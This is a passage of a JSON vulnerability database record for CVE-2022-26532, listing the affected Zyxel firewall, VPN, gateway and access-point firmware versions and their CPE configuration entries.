            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "wac500h",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abwa.2\\)"
          },
          {
            "model": "nwa110ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abtg.2\\)"
          },
          {
            "model": "nwa1123acv3",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abvt.2\\)"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nsg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.00"
          },
          {
            "model": "wac6303d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abgl.6\\)"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "wax630s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abzd.2\\)"
          },
          {
            "model": "usg210",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "wac6503d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aasf.7\\)"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nsg50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "nwa1123-ac-pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abhd.7\\)"
          },
          {
            "model": "usg 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "nsg100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.00"
          },
          {
            "model": "usg200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nsg300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "wac6502d-e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aasd.7\\)"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg2200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "nwa1123-ac-hd",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abin.6\\)"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wac6502d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aase.7\\)"
          },
          {
            "model": "usg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "wax610d",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abte.2\\)"
          },
          {
            "model": "usg 60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1900_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1900:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg210:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg2200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.00",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch2:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch3:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.00",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch2:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch3:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
